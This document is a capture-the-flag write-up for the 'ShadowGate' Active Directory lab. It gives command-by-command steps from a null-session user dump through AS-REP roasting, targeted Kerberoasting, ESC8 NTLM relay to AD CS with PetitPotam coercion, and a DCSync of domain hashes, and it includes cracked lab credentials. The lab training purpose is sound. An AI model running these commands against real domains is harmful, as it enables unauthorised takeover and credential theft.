ShadowGate

Note: This is a free lab! Spin it up on the HackSmarter Platform and make sure to join the Discord Server—the best cybersecurity community to hang out and level up!

Summary

ShadowGate is a straightforward Active Directory lab from HackSmarter focused on internal misconfigurations. The attack path starts with a Null Session to dump usernames, leading directly to an AS-REP Roasting compromise. Post-exploitation with BloodHound reveals a GenericWrite permission over another domain account, allowing us to execute a Targeted Kerberoasting attack. Finally, running Certipy uncovers a weak ADCS setup ripe for an ESC8 exploit, letting us relay authentication to get full Domain Admin rights.

Scanning

We are dealing with a Domain Controller based on the services running on the target:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 126 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-21 23:02:37Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: shadow.gate0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing

Initial Creds

Make sure to update your /etc/hosts

nxc smb 10.1.22.120

Initial Enum

We can enumerate valid users using a null session, there are multiple ways to do it like using rpcclient

rpcclient -U '' 10.1.22.120 -N -c 'enumdomusers'

Domain Users

Use the following one-liner to get all the domain users and save them into a file

rpcclient -U '' 10.1.22.120 -N -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]' | tee users.txt

Users File

ASREProast Attack

Having a list of domain users, we can test for ASREProast and in this case we are able to grab a hash for jtrueblood

GetNPUsers.py -no-pass -usersfile users.txt shadow.gate/ -output hashes

ASREProast

Cracking with john

john hashes --wordlist=/usr/share/wordlists/rockyou.txt

First Creds

We managed to get our initial domain credentials!

nxc smb 10.1.22.120 -u 'jtrueblood' -p 'blood_brothers' --shares

Shares

BloodHound Enum

We will use rusthound-ce to get the data we need for bloodhound

rusthound-ce -u 'jtrueblood' -p 'blood_brothers' -d shadow.gate -z

Happy Graphing

Targeted Kerberoast

Once data ingested on bloodhound, we notice the user we compromised before has GenericWrite over BBROWN

GenericWrite

This privilege allows us to perform Targeted Kerberoasting and get bbrown’s password after cracking its hash

# Making bbrown vulnerable to kerberoasting
❯ targetedKerberoast.py -v -d 'shadow.gate' -u 'jtrueblood' -p 'blood_brothers' -o bbrown.hash
# Cracking
❯ john bbrown.hash --wordlist=/usr/share/wordlists/rockyou.txt

Bbrown Pwned

ESC8 - NTLM Relay to AD CS Web Enrollment

This new user has no interesting permissions but it’s member of ADCS-READER group.

ADCS-READER

Our next steps would be using certipy to enumerate vulnerable templates on the ADCS

certipy find -u 'bbrown' -p '12345678' -dc-ip '10.1.22.120' -vulnerable -stdout

Vulnerability Found

Certipy found a vulnerability that targets an AD CS HTTP-based enrollment endpoint. (ESC8)

Web Enrollment page

Web Enrollment service

You can enumerate templates with the following command

certipy find -u 'bbrown' -p '12345678' -dc-ip '10.1.22.120' -enabled -stdout

DomainController Template

As shown in this post, we will use certipy to relay NTLM authentication to the ADCS server and use any tool to force an authentication. For instance, we will use nxc and its module coerce_plus.

# Setting up Relay Listener with Certipy
❯ certipy relay -target 'http://10.1.22.120' -template 'DomainController'
# Forced Authentication
❯ nxc smb 10.1.22.120 -M coerce_plus -o METHOD=Petitpotam -o LISTENER=10.200.59.29

ESC8 Attack

After that we would get a pfx file for the domain controller, we would certipy one more time to get the hash of the machine account.

certipy auth -pfx dc01.pfx -dc-ip 10.1.22.120

DC01$ NT Hash

Authenticated as the Domain Controller, we can now dump any user hash and gain full access to the server:

impacket-secretsdump 'dc01$@10.1.22.120' -hashes :57867e655d1abc9f45fd6e954e351531 -just-dc-user Administrator

DCSync

Tasks

• What is the KRBTGT NT Hash?

❯ impacket-secretsdump 'dc01$@10.1.22.120' -hashes :57867e655d1abc9f45fd6e954e351531 -just-dc-user krbtgt | grep krbtgt -m1 | cut -f4 -d:
b55**************************802

That’s a wrap for this box! Hack smarter, not harder! 🎯 🏁